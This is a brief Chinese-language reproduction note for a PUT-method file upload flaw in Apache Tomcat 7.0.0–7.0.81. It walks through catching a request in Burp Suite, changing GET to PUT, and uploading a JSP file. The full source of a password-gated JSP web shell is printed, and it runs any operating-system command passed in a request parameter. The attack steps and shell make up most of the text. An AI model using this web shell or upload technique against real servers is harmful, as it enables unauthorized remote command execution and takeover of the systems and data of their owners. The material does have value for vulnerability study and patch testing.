影响版本:
Apache Tomcat 7.0.0 - 7.0.81
ps:安装Tomcat需要安装jdk(JAVA环境)
下面来正经复现,Payload:
利用burpsuite 进行抓包
发送到repeater,修改GET请求为PUT,修改名字,下面添加jsp的shell
shell:
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp +"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
访问看看
执行命令
